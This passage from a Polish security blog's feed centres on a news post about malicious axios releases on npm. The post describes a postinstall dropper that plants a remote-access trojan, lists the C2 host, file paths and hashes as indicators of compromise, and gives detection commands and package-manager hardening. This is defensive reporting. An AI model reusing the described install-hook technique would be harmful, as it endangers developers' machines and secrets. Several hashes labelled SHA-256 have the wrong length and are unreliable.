<p>Nigdy nie powinieneś płacić czy logować się po kliknięciu w link z e-maila. Najlepiej samodzielnie wejść na właściwy serwis internetowy nadawcy i poszukać akcji/opcji o której informuje Cię w e-mailu. Wtedy masz pewność, że klikasz po właściwym serwisie. Jeśli po kliknięciu w link widzisz formularz logowania lub płatności, to popatrz na adres URL. Zweryfikuj też szczegóły ewentualnej płatności (kwota, odbiorca), bo bramka płatności może być prawdziwa, ale pieniądze niekoniecznie powędrują tam gdzie myślisz lub w kwocie której się spodziewałeś.</p>
<p>A jeśli prowadzisz firmę i oferujesz jakąś usługę zwykłym konsumentom, nie proponuj im płatności e-mailem po kliknięciu w link. </p>
<p>Ryzyk czyhających na internautów jest więcej. Opowiadamy o nich w trakcie wykładu &#8220;<a href="https://niebezpiecznik.pl/wyklad" target="_blank">Jak nie dać się zhackować?</a>&#8220;, który już w kwietniu odbędzie się w <strong>Krakowie</strong> i <strong>Warszawie</strong>. <a href="https://bilety.niebezpiecznik.pl/" target="_blank">Zobacz pełną agendę tego wykładu i terminy</a>. PS. Można (a nawet powinno się) na ten wykład wysłać lub przyjść z nietechnicznymi znajomymi! </p>
]]></content>
		
					<link href="https://niebezpiecznik.pl/post/duze-firmy-przyuczaja-ludzi-do-phishingu-po-tym-jak-przed-nim-ostrzegaly/#comments" rel="replies" thr:count="20" type="text/html"/>
			<link href="https://niebezpiecznik.pl/post/duze-firmy-przyuczaja-ludzi-do-phishingu-po-tym-jak-przed-nim-ostrzegaly/feed/atom/" rel="replies" thr:count="20" type="application/atom+xml"/>
			<thr:total>20</thr:total>
			</entry>
		<entry>
		<author>
			<name>redakcja</name>
					</author>

		<title type="html"><![CDATA[Poważny atak programistów. Popularna biblioteka axios była zainfekowana.]]></title>
		<link href="https://niebezpiecznik.pl/post/powazny-atak-programistow-popularna-biblioteka-axios-byla-zainfekowana/" rel="alternate" type="text/html"/>

		<id>https://niebezpiecznik.pl/?p=26976</id>
		<updated>2026-03-31T08:36:24Z</updated>
		<published>2026-03-31T07:51:10Z</published>
		<category scheme="https://niebezpiecznik.pl" term="*GLOWNA"/><category scheme="https://niebezpiecznik.pl" term="ataki"/><category scheme="https://niebezpiecznik.pl" term="axios"/><category scheme="https://niebezpiecznik.pl" term="programowanie"/><category scheme="https://niebezpiecznik.pl" term="supply-chain"/>
		<summary type="html"><![CDATA[<a href="https://niebezpiecznik.pl/post/powazny-atak-programistow-popularna-biblioteka-axios-byla-zainfekowana/"><img align="left" hspace="5" width="100" height="100" src="https://niebezpiecznik.pl/wp-content/uploads/2026/03/axios-meme-150x150.jpg" class="alignleft tfe wp-post-image" alt="" decoding="async" loading="lazy" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/03/axios-meme-150x150.jpg 150w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/axios-meme-252x250.jpg 252w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/axios-meme-600x594.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/axios-meme-768x761.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/axios-meme.jpg 1234w" sizes="auto, (max-width: 100px) 100vw, 100px" /></a>Oprogramowanie na twoim komputerze korzysta z Node&#8217;a? I masz w paczkę axiosa jako zależność? Rzuć wszystko i sprawdź z jakiej wersji korzystasz. Ktoś wstrzyknął do tej biblioteki złośliwy kod. Jeśli ją pobrałeś, Twój sprzęt i klucze chmurowe są w rękach przestępców. Co się stało? Właśnie odkryto kolejny poważny atak na łańcuch dostaw. Tym razem oberwała popularna biblioteka [&#8230;]]]></summary>

					<content type="html" xml:base="https://niebezpiecznik.pl/post/powazny-atak-programistow-popularna-biblioteka-axios-byla-zainfekowana/"><![CDATA[<p>Oprogramowanie na twoim komputerze korzysta z Node&#8217;a? I masz w paczkę <span class="code">axiosa</span> jako zależność? Rzuć wszystko i sprawdź z jakiej wersji korzystasz. Ktoś wstrzyknął do tej biblioteki złośliwy kod. Jeśli ją pobrałeś, Twój sprzęt i klucze chmurowe są w rękach przestępców. <span id="more-26976"></span></p>
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/03/axios-meme.jpg"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/03/axios-meme-252x250.jpg" alt="" width="252" height="250" class="aligncenter size-medium wp-image-26977" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/03/axios-meme-252x250.jpg 252w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/axios-meme-600x594.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/axios-meme-150x150.jpg 150w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/axios-meme-768x761.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/axios-meme.jpg 1234w" sizes="auto, (max-width: 252px) 100vw, 252px" /></a></p>
<h3>Co się stało?</h3>
<p>Właśnie odkryto <a href="https://niebezpiecznik.pl/post/litellm-pypi-python-hack/" target="_blank">kolejny poważny atak na łańcuch dostaw</a>. Tym razem oberwała popularna biblioteka programistyczna <strong>axios</strong> powszechnie wykorzystywana do generowania żądań HTTP (pobierana ok. <strong>100 milionów razy tygodniowo</strong>!). Tuż po północy atakujący przejęli kontrolę nad kontem <strong>npm</strong> twórcy biblioteki axios i opublikowali dwie złośliwe wersje, omijając pipeline CI/CD oparty o GitHub Actions i OIDC (Trusted Publisher). Skorzystali po prostu z ręcznej publikacji z pomocą wykradzionego developerowi długoterminowego tokenu dostępu (kto wie, może ów developer, czyli <strong>jasonsaayman</strong> jest ofiarą <a href="https://niebezpiecznik.pl/post/litellm-pypi-python-hack/" target="_blank">ostatniego ataku na LiteLLM</a>?).</p>
<p>Oto zainfekowane paczki:<br />
<code>1.14.1 (31 marca o 00:21 UTC, tag latest)<br />
0.30.4 (31 marca 01:00 UTCtag legacy) </code></p>
<p>Zachowanie wstrzykniętego złośliwego kodu różni się między systemami:</p>
<ul>
<li><strong>Windows</strong>: Nadpisuje i chowa się pod fałszywym plikiem Windows Terminal (<span class="code">%PROGRAMDATA%\wt.exe</span>), po czym odpala złośliwego PowerShella. (np. <span class="code">%TEMP%\6202033.ps1</span>, <span class="code">%TEMP%\6202033.vbs</span>)</li>
<li><strong>macOS</strong>: Udaje demona systemowego, zrzucając plik do rzadko sprawdzanego katalogu <span class="code">/Library/Caches/com.apple.act.mond</span> (plus pliki pod <span class="code">$TMPDIR/6202033</span>).</li>
<li><strong>Linux</strong>: Instaluje pythonowego backdoora w <span class="code">/tmp/ld.py</span>.</li>
</ul>
<p>Malware łączy się z C2 pod adresem <span class="code">sfrclak[.]com:8000</span> i wysyła dane o Twoim środowisku, nasłuchuje poleceń oraz zaciera za sobą ślady usuwając pliki instalacyjne. Daje też atakującemu możliwość zdalnego wykonania kodu (RCE).</p>
<blockquote><p>IoC:<br />
IP Serwerów C2: 142.11.206[.]73<br />
Domena kampanii C2 i URL: http://sfrclak[.]com:8000/6202033 oraz sfrclak[.]com (do odrzucenia na poziomie /etc/hosts / iptables)<br />
Złośliwe emaile: ifstap@proton.me oraz nrwise@proton.me<br />
SHA-256 Sumy pakietów w przestrzeni npm:<br />
złośliwy axios w. 1.14.1 &#8211; 2553649f232204966871cea80a5d0d6adc700ca<br />
złośliwy axios w. 0.30.4 &#8211; d6f3f62fd3b9f5432f5782b62d8cfd5247d5ee71<br />
złośliwy pakiet plain-crypto-js w. 4.2.1 &#8211; 07d889e2dadce6f3910dcbc253317d28ca61c766<br />
Payload ld.py &#8211; fcb81618bb15edfdedfb638b4c08a2af9cac9ecfa551af135a8402bf980375cf<br />
pierwszy dropper setup.js &#8211; e10b1fa84f1d6481625f741b69892780140d4e0e7769e7491e5f4d894c2e0e09</p></blockquote>
<h3>Szczegóły techniczne ataku</h3>
<p>Atak był dość dyskretny, nie zmodyfikowano ani jednej linii kodu źródłowego axiosa (co mocno utrudniało wykrycie problemu m.in. z pomocą bazujących na kodzie skanerów typu diff). Jedynymi modyfikacjami w pliku <span class="code">package.json</span> było dodanie złośliwej zależności <span class="code">plain-crypto-js: &#8220;^4.2.1&#8221;</span> oraz usunięcie natywnego skryptu <span class="code">&#8220;prepare&#8221;: &#8220;husky&#8221;</span>. </p>
<p>Nowa zależność nigdy nie była importowana, jej celem było osadzenie instrukcji wywoływanej przy pobieraniu pakietu w tle: <span class="code">&#8220;postinstall&#8221;: &#8220;node setup.js&#8221;</span>. Nieźle to zaplanowano, bo pakiet <span class="code"><a href="https://socket.dev/npm/package/plain-crypto-js/files/4.2.1/setup.js" target="_blank">plain-crypto-js</a></span> udostępnił na nowym koncie na platformie ProtonMail inny osobnik, podpisujący się jako <strong>nrwise</strong> (nrwise@proton.me). Pierwsza wersja z pełnym fałszywym i nieaktywnym kodem (4.2.0) została umieszczona w serwisie <strong>30 marca o 05:57 UTC</strong>, a zainfekowana (4.2.1) o 23:59 UTC, czyli tuż przed wstrzyknięciem jej do złośliwego axiosa. Aby uśpić czujność ewentualnych badaczy, <strong>plain-crypto-js</strong> podszywał się pod inną, bezpieczną bibliotekę <span class="code">crypto-js</span> poprzez linkowanie opisu, aż po kopiowanie dziesiątek z oryginalnych plików (m.in. aes.js o rozmiarze 8649 bajtów, blowfish.js, md5.js, sha256.js, itp.). </p>
<p>Jedyne obce i groźne pliki we wstrzykniętym archiwum to zaledwie jedno-linijkowy <span class="code">setup.js</span> (wielkości 4209 bajtów) oraz czysty szablon konfiguracji <span class="code">package.md</span> o rozmiarze 725 bajtów. Tutaj <a href="https://www.stepsecurity.io/blog/axios-compromised-on-npm-malicious-versions-drop-remote-access-trojan" target="_blank">pełna analiza</a> wstrzykniętego trojana. </p>
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/03/axios-npm.jpg"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/03/axios-npm-600x224.jpg" alt="" width="600" height="224" class="aligncenter size-large wp-image-26978" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/03/axios-npm-600x224.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/axios-npm-350x131.jpg 350w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/axios-npm-768x287.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/axios-npm-1536x574.jpg 1536w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/axios-npm.jpg 1658w" sizes="auto, (max-width: 600px) 100vw, 600px" /></a></p>
<h3>Mam Axiosa &#8212; co robić, jak żyć?</h3>
<p>Jeśli zainstalowałeś wersję 1.14.1 lub 0.30.4, musisz założyć najgorsze. Atakujący mogli mieć całkowity dostęp do Twojego systemu. Dlatego natychmiast:</p>
<ul>
<li>Sprawdź czy masz zainfekowane paczki. Stepsecurity sugeruje wykonanie tych poleceń:
<p><code>npm list axios 2>/dev/null | grep -E "1\.14\.1|0\.30\.4"<br />
grep -A1 '"axios"' package-lock.json | grep -E "1\.14\.1|0\.30\.4"<br />
ls node_modules/plain-crypto-js 2>/dev/null && echo "POTENTIALLY AFFECTED"<br />
# macOS<br />
ls -la /Library/Caches/com.apple.act.mond 2>/dev/null && echo "COMPROMISED"<br />
# Linux<br />
ls -la /tmp/ld.py 2>/dev/null && echo "COMPROMISED"<br />
# Windows (cmd.exe)<br />
dir "%PROGRAMDATA%\wt.exe" 2>nul && echo COMPROMISED</code></p>
<li>Odłącz maszynę od internetu, zbierz ślady pod forensic, a jeśli nie zamierzasz lub nie potrafisz go przeprowadzać, to odtwórz maszynę z czystego backupu lub przeinstaluj.
<li>Zrotuj klucze SSH, klucze API, tokeny NPM i inne sekrety. Nie zapomnij o plikach .env. Zmień hasła.
</ul>
<p><strong>Na przyszłość:</strong> Jeśli nie musisz, nie pozwalaj paczkom na samowolkę podczas instalacji. Używaj flagi npm ci <span class="code">&#8211;ignore-scripts</span>. Warto też zauważyć, że oba wydania pozbawione były commitów (brak pola gitHead), oficjalnych tagów w repozytorium GitHub (wywołanie GitHub API o tag v1.14.1 zwracało błąd 404) oraz SLSA provenance attestations, które w wersji poprzedniej (1.14.0 i 0.30.3) były obecne. Warto się zastanowić, czy nie wykrywać tego typu anomalii przy zaciąganiu nowych wersji paczek. Albo czy nie <strong>opóźniać instalacji nowych paczek</strong> o kilka dni &#8212; jak widać po ostatnich atakach, community dość szybko wykrywa ataki, więc zamrożenie wersji zależności może być dobrym ogranicznikiem ryzyka.</p>
<p><code>~/.config/uv/uv.toml<br />
  exclude-newer = "7 days"<br />
  ~/.npmrc<br />
  min-release-age=7 # days<br />
  ignore-scripts=true<br />
  ~/Library/Preferences/pnpm/rc<br />
  minimum-release-age=10080 # minutes<br />
  ~/.bunfig.toml<br />
  [install]<br />
  minimumReleaseAge = 604800 # seconds</code></p>
<p>Jeśli potrzebujecie zadbać o <strong>bezpieczeństwo swoich projektów programistycznych</strong> od A do Z, to zapraszamy na nasze turbo-praktyczne szkolenie &#8220;<a href="https://niebezpiecznik.pl/web" target="_blank">Bezpieczeństwo Webaplikacji</a>&#8220;, w ramach którego podczas <strong>praktycznych 2-dniowych warsztatów</strong> pokazujemy jakich błędów przy tworzeniu oprogramowania uniknąć i jak im zapobiegać. Średnia ocen tego szkolenia to <strong>9,45/10</strong>. Oto najbliższe terminy tego szkolenia:</p>
<div class="info"><div><p><b style="color:#f00"><span style="color:#FF00FF">ZDALNIE</span></b>: <strong>14-15 maja 2026</strong>r. — <b style="color:#f00">UWAGA</b>: zostały <strong> tylko 3 wolne miejsca</strong><br />
                        Ostatnio ktoś zarejestrował się 27 kwietnia 2026r. → <a href="https://niebezpiecznik.pl/szkolenia/rejestracja/?sz=1ifh8i6">zarejestruj się na to szkolenie</a></p>
                        
                        <ul>
                        2444 PLN netto (do 1 maja)<br>
                        2744 PLN netto (od 2 maja)
                        </ul></div><div><p><b style="color:#f00">Kraków</b>: <strong>22-23 czerwca 2026</strong>r. — <b style="color:#f00">UWAGA</b>: zostały <strong> tylko 4 wolne miejsca</strong><br />
                        Ostatnio ktoś zarejestrował się 13 kwietnia 2026r. → <a href="https://niebezpiecznik.pl/szkolenia/rejestracja/?sz=1gqo7fr">zarejestruj się na to szkolenie</a></p>
                        
                        <ul>
                        2444 PLN netto (do 8 maja)<br>
                        2744 PLN netto (od 9 maja)
                        </ul></div><div><p><b style="color:#f00">Warszawa</b>: <strong>02-03 lipca 2026</strong>r. — zostało <strong>8 wolnych miejsc</strong><br />
                        Ostatnio ktoś zarejestrował się 17 kwietnia 2026r. → <a href="https://niebezpiecznik.pl/szkolenia/rejestracja/?sz=1gqobbl">zarejestruj się na to szkolenie</a></p>
                        
                        <ul>
                        2444 PLN netto (do 8 maja)<br>
                        2744 PLN netto (od 9 maja)
                        </ul></div><div><p><b style="color:#f00">Wrocław</b>: <strong>07-08 września 2026</strong>r. — zostało <strong>9 wolnych miejsc</strong><br />
                        Ostatnio ktoś zarejestrował się 27 kwietnia 2026r. → <a href="https://niebezpiecznik.pl/szkolenia/rejestracja/?sz=1idapyj">zarejestruj się na to szkolenie</a></p>
                        
                        <ul>
                        2444 PLN netto (do 15 maja)<br>
                        2744 PLN netto (od 16 maja)
                        </ul></div><div><p><b style="color:#f00">Poznań</b>: <strong>14-15 grudnia 2026</strong>r. — zostało <strong>9 wolnych miejsc</strong><br />
                        Ostatnio ktoś zarejestrował się 27 kwietnia 2026r. → <a href="https://niebezpiecznik.pl/szkolenia/rejestracja/?sz=1idaqel">zarejestruj się na to szkolenie</a></p>
                        
                        <ul>
                        2444 PLN netto (do 29 maja)<br>
                        2744 PLN netto (od 30 maja)
                        </ul></div></div>
<p><em>Podzielcie się tym info z kolegami i koleżankami z zespołów. Kto pierwszy w biurze wpisał w nocy lub nad ranem npm update, ten potrzebuje pomocy. Sprawdźcie też czy jakieś automatyzacje nie budowały/aktualizowały Wam przez noc softu/środowiska w oparciu o axiosa. Wygląda na to, że nocne kodowanie to jednak nie taki zen&#8230; </em></p>
]]></content>
		
					<link href="https://niebezpiecznik.pl/post/powazny-atak-programistow-popularna-biblioteka-axios-byla-zainfekowana/#comments" rel="replies" thr:count="12" type="text/html"/>
			<link href="https://niebezpiecznik.pl/post/powazny-atak-programistow-popularna-biblioteka-axios-byla-zainfekowana/feed/atom/" rel="replies" thr:count="12" type="application/atom+xml"/>
			<thr:total>12</thr:total>
			</entry>
		<entry>
		<author>
			<name>redakcja</name>
					</author>

		<title type="html"><![CDATA[Jak Nie Dać Się Zhackować? Czyli nasz wykład dla każdego znowu w Twoim mieście :)]]></title>
		<link href="https://niebezpiecznik.pl/post/jak-nie-dac-sie-zhackowac-czyli-nasz-wyklad-dla-kazdego-znowu-w-twoim-miescie/" rel="alternate" type="text/html"/>

		<id>https://niebezpiecznik.pl/?p=26972</id>
		<updated>2026-03-30T08:39:33Z</updated>
		<published>2026-03-30T08:39:33Z</published>
		<category scheme="https://niebezpiecznik.pl" term="*GLOWNA"/>
		<summary type="html"><![CDATA[<a href="https://niebezpiecznik.pl/post/jak-nie-dac-sie-zhackowac-czyli-nasz-wyklad-dla-kazdego-znowu-w-twoim-miescie/"><img align="left" hspace="5" width="100" height="100" src="https://niebezpiecznik.pl/wp-content/uploads/2019/03/m181204_NBZP0047-150x150.jpg" class="alignleft tfe wp-post-image" alt="" decoding="async" loading="lazy" /></a>Każdy, kto korzysta z komputera, smartfona i internetu powinien wiedzieć jak robić to bezpiecznie. Od lat, tego jak “nie dać się zhackować” uczymy nie tylko pracowników największych polskich firm na szkoleniach zamkniętych odbywających się w ich siedzibach, ale także każdego kto chce — wystarczy wpaść na nasz 3 godzinny, pełen praktycznych porad i widowiskowych pokazów wykład. Właśnie ruszamy w [&#8230;]]]></summary>

					<content type="html" xml:base="https://niebezpiecznik.pl/post/jak-nie-dac-sie-zhackowac-czyli-nasz-wyklad-dla-kazdego-znowu-w-twoim-miescie/"><![CDATA[<p>Każdy, kto korzysta z komputera, smartfona i internetu powinien wiedzieć jak robić to bezpiecznie. Od lat, tego jak “nie dać się zhackować” uczymy nie tylko pracowników największych polskich firm na <a href="https://niebezpiecznik.pl/post/zapros-niebezpiecznika-do-twojej-firmy-na-goscinny-wyklad-z-cyberbezpieczenstwa/?" target="_blank">szkoleniach zamkniętych odbywających się w ich siedzibach</a>, ale także <strong>każdego kto chce</strong> — wystarczy wpaść na nasz 3 godzinny, pełen praktycznych porad i widowiskowych pokazów <a href="https://niebezpiecznik.pl/wyklad" target="_blank">wykład</a>. Właśnie ruszamy w Polskę z jego 6, ulepszoną edycją &#8212; tym razem odwiedzimy następujące miasta (start o <strong>17:30</strong>):<span id="more-26972"></span></p>
<ul>
		<!-- li><a href="https://nbzp.cz/jnsz-kra2510" target="_blank">KRAKOW <small>(weekend)</small> 4 października -- zapisz się tutaj!</a></li-->
		<li><a href="https://nbzp.cz/jnsz-wro2606" target="_blank">WROCŁAW, 11 czerwca -- zapisz się tutaj!</a></li>
                <li><a href="https://nbzp.cz/jnsz-poz2610" target="_blank">POZNAŃ, 8 października -- zapisz się tutaj!</a></li>
                <li><a href="https://nbzp.cz/jnsz-lod2610" target="_blank">ŁÓDŹ, 22 października -- zapisz się tutaj!</a></li>
                <li><a href="https://nbzp.cz/jnsz-gda2611" target="_blank">GDAŃSK, 19 listopada -- zapisz się tutaj!</a></li>
</ul>
<div class="info">Jesteś z innego miasta? Nic nie szkodzi, tam pewnie też będziemy! Zostaw nam e-maila w polu poniżej, a powiadomimy Cię o kolejnych terminach: </p>
<form action="https://info.niebezpiecznik.pl/subscribe" method="POST" accept-charset="utf-8" target="_blank" style="margin-top:10px">
<label for="email">E-mail: </label><input type="email" name="email" id="email" size="30" style="margin-bottom:10px"/><br />
<label for="City">Miasto: </label><input type="text" name="City" id="City" style="margin-bottom:10px"/><br />
<input type="submit" name="submit" id="submit" value="Informuj mnie!"/></p>
<div style="display:none"><input type="hidden" name="list" value="my7633jgS8rm9n4vQEyWYBeQ"/> <input type="hidden" name="subform" value="yes"/><label for="hp">HP</label><br /><input type="text" name="hp" id="hp"/></div>
</form>
</div>
<h3>Dlaczego warto przyjść na nasz wykład?</h3>
<p>Poniżej 4 konkretne powody:</p>
<ul>
<strong><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Prosty język.</strong> Wykład bez problemu zrozumieją <strong>osoby nietechniczne</strong> &#8212; prowadzimy go w przystępny dla każdego sposób. Dlatego zapraszamy Was z <strong>rodzicami, dziadkami i znajomymi spoza branży IT</strong>.</p>
<p><strong><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Praktyczne i proste do wdrożenia rady.</strong> Pokażemy Ci jak co zrobić, aby ochronić swoje <strong>pieniądze, dane i prywatność</strong> przed cyberatakami. Nauczymy jak <strong>zabezpieczyć swój komputer i smartfon</strong> &#8212; co włączyć, co wyłączyć, jakie darmowe aplikacje wart doinstalować.</p>
<p><strong><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Demonstracje ataków na żywo</strong>. W trakcie wykładu pokazujemy na publiczności niektóre z ataków. To robi wrażenie i pomaga lepiej zrozumieć jak powinna wyglądać poprawna reakcja.    </p>
<p><strong><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Gwarancja jakości.</strong> Wykład widziało już <strong>kilkaset tysięcy Polaków</strong>. Aktualna średnia ocena to <strong>9,48/10</strong>.</ul>
<p>Jeśli Cię przekonaliśmy, to:</p>
<p><a href="https://bilety.niebezpiecznik.pl"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2018/01/zarejestruj-sie-350x85.png" alt="" width="350" height="85" class="aligncenter size-medium wp-image-16113" srcset="https://niebezpiecznik.pl/wp-content/uploads/2018/01/zarejestruj-sie-350x85.png 350w, https://niebezpiecznik.pl/wp-content/uploads/2018/01/zarejestruj-sie-768x187.png 768w, https://niebezpiecznik.pl/wp-content/uploads/2018/01/zarejestruj-sie-600x146.png 600w, https://niebezpiecznik.pl/wp-content/uploads/2018/01/zarejestruj-sie.png 1084w" sizes="auto, (max-width: 350px) 100vw, 350px" /></a></p>
<p>Poniżej kilka opinii uczestników ostatnich edycji tego wykładu:</p>
<blockquote><p>Fantastyczny wykład. 3 godziny to nie tak mało jak na jedno podejście, a nawet nie wiem kiedy minęły.</p></blockquote>
<blockquote><p>Wykład oceniam wysoko ponieważ, pomimo dosyć dużej wiedzy na ten tamat (interesuje się bezpieczeństwem, czytam niebezpiecznika od dłuższego czasu a od niedawna pracuje w dziale application security) i pomimo tego że się dużo nie dowiedziałem nowego, to naprawdę fajnie spędziłem czas :). Dostałem też, dodatkowej motywacji, aby jeszcze więcej edukować rodzinę i moich znajomych. Dzięki!</p></blockquote>
<blockquote><p>Przydatne były informacje które uświadomiły mi, jak bardzo ważne jest, żeby chronić swoje dane osobowe. Nie zdawałam sobie sprawy jak łatwo można je pozyskać. BARDZO podobał mi się sposób mówienia, lekkość językowa. Łatwa, i zrozumiała nawet dla osoby która nie zna się na tych informatycznych rzeczach :)</p></blockquote>
<blockquote><p>Przed wykładem wydawało mi się, że jestem w zasadzie bezpieczny, że nie tak łatwo kogoś &#8220;zhakować&#8221;. Po wykładzie zrozumiałem, że się myliłem. Jeśli ktoś jest odpowiednio zdeterminowany, posiada wiedzę i cierpliwość, to może to zrobić. Warto mu więc to utrudniać w każdy możliwy sposób.</p></blockquote>
<div id="attachment_19289" style="width: 610px" class="wp-caption aligncenter"><a href="https://niebezpiecznik.pl/wp-content/uploads/2019/03/m181204_NBZP0104.jpg"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-19289" src="https://niebezpiecznik.pl/wp-content/uploads/2019/03/m181204_NBZP0104-600x400.jpg" alt="Uczestnicy poprzedniego wykładu we Wrocławiu" width="600" height="400" class="size-large wp-image-19289" srcset="https://niebezpiecznik.pl/wp-content/uploads/2019/03/m181204_NBZP0104-600x400.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2019/03/m181204_NBZP0104-350x234.jpg 350w, https://niebezpiecznik.pl/wp-content/uploads/2019/03/m181204_NBZP0104-768x513.jpg 768w" sizes="auto, (max-width: 600px) 100vw, 600px" /></a><p id="caption-attachment-19289" class="wp-caption-text">Uczestnicy poprzedniego wykładu we Wrocławiu podczas jednego z eksperymentów :)</p></div>
<p><a href="https://bilety.niebezpiecznik.pl"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2018/01/zarejestruj-sie-350x85.png" alt="" width="350" height="85" class="aligncenter size-medium wp-image-16113" srcset="https://niebezpiecznik.pl/wp-content/uploads/2018/01/zarejestruj-sie-350x85.png 350w, https://niebezpiecznik.pl/wp-content/uploads/2018/01/zarejestruj-sie-768x187.png 768w, https://niebezpiecznik.pl/wp-content/uploads/2018/01/zarejestruj-sie-600x146.png 600w, https://niebezpiecznik.pl/wp-content/uploads/2018/01/zarejestruj-sie.png 1084w" sizes="auto, (max-width: 350px) 100vw, 350px" /></a></p>
<h3>Tematyka wykładu &#8220;Jak nie dać się zhackować?&#8221;</h3>
<p>W ramach trwającego łącznie 3 godziny wykładu (z 15 minutową przerwą w środku) pokażemy Ci:</p>
<ul>
<li>Jak poprawnie <strong>zabezpieczyć komputer i smartfona</strong>, aby nie zostały one zhackowane przez cyberprzestępców</li>
<li>Jak <strong>nie paść ofiarą aktualnych oszustw internetowych, scamów i przekrętów</strong></li>
<p> </p>
<li>Jak najlepiej ochronić swoje pieniądze i jak bezpiecznie robić <strong>zakupy w internecie </strong></li>
<li>Jak <strong>zabezpieczyć swoje dane i komunikację</strong>, aby nie zostały one przez nikogo przechwycone</li>
<li>Jak <strong>chronić swoją prywatność</strong> w trakcie korzystania z e-maila i serwisów społecznościowych</li>
<li>Jak bezpiecznie <strong>korzystać z bankowości internetowej</strong></li>
</ul>
<p>Powyższe zagadnienia zilustrujemy prawdziwymi przykładami ataków, jakie w ostatnich miesiącach dotknęły Polaków, a dodatkowo sami, <strong class="update">na żywo</strong> pokażemy jak atakują cyberprzestępcy.</p>
<ul>
<li>Podszyjemy się pod Pana prezydenta</li>
<li>Wykradniemy dane z telefonu komórkowego</li>
<li>Pokażemy jak szybko łamane są hasła Polaków</li>
<li>Zainfekujemy laptopa ofiary i będziemy ją podglądali przez wbudowaną w laptopa kamerkę</li>
<li>Przejmiemy kontrolę nad komputerem przy pomocy złośliwego pendrive&#8217;a albo ładowarki do papierosa elektronicznego</li>
</ul>
<p>Wierzcie nam, że w trakcie tych pokazów szczęka opadnie Wam nie raz&#8230; Gwarantujemy, że nikt, kto weźmie udział w tym wykładzie, już nigdy nie będzie tym samym człowiekiem  :)</p>
<p><iframe loading="lazy" width="560" height="315" src="https://www.youtube.com/embed/gn-Qit9Qdxg?si=o8WOe7Ul3bLJ2RMM" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe></p>
<div class="info">Bilet na wykład możesz także kupić dla kogoś: <strong>Mamy, Taty, Babci, Syna, Znajomego</strong>. To idealny i praktyczny prezent &#8220;na święta&#8221;. Cena biletu to zdecydowanie mniejszy wydatek niż koszt jak musiałbyś ponieść, żeby posprzątać po ewentualnym ataku na bliską Ci osobę. Warto zadbać o swoich bliskich :)</div>
<p><a href="https://bilety.niebezpiecznik.pl"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2018/01/zarejestruj-sie-350x85.png" alt="" width="350" height="85" class="aligncenter size-medium wp-image-16113" srcset="https://niebezpiecznik.pl/wp-content/uploads/2018/01/zarejestruj-sie-350x85.png 350w, https://niebezpiecznik.pl/wp-content/uploads/2018/01/zarejestruj-sie-768x187.png 768w, https://niebezpiecznik.pl/wp-content/uploads/2018/01/zarejestruj-sie-600x146.png 600w, https://niebezpiecznik.pl/wp-content/uploads/2018/01/zarejestruj-sie.png 1084w" sizes="auto, (max-width: 350px) 100vw, 350px" /></a></p>
]]></content>
		
					<link href="https://niebezpiecznik.pl/post/jak-nie-dac-sie-zhackowac-czyli-nasz-wyklad-dla-kazdego-znowu-w-twoim-miescie/#comments" rel="replies" thr:count="3" type="text/html"/>
			<link href="https://niebezpiecznik.pl/post/jak-nie-dac-sie-zhackowac-czyli-nasz-wyklad-dla-kazdego-znowu-w-twoim-miescie/feed/atom/" rel="replies" thr:count="3" type="application/atom+xml"/>
			<thr:total>3</thr:total>
			</entry>
		<entry>
		<author>
			<name>redakcja</name>
					</author>

		<title type="html"><![CDATA[Ktoś zatruł popularną pythonową paczkę z 97 milionami pobrań&#8230;]]></title>
		<link href="https://niebezpiecznik.pl/post/litellm-pypi-python-hack/" rel="alternate" type="text/html"/>

		<id>https://niebezpiecznik.pl/?p=26965</id>
		<updated>2026-03-25T11:16:29Z</updated>
		<published>2026-03-25T11:15:52Z</published>
		<category scheme="https://niebezpiecznik.pl" term="*GLOWNA"/><category scheme="https://niebezpiecznik.pl" term="AI"/><category scheme="https://niebezpiecznik.pl" term="Hacked!"/><category scheme="https://niebezpiecznik.pl" term="LiteLLM"/><category scheme="https://niebezpiecznik.pl" term="programowanie"/><category scheme="https://niebezpiecznik.pl" term="PyPI"/><category scheme="https://niebezpiecznik.pl" term="python"/><category scheme="https://niebezpiecznik.pl" term="supply-chain"/>
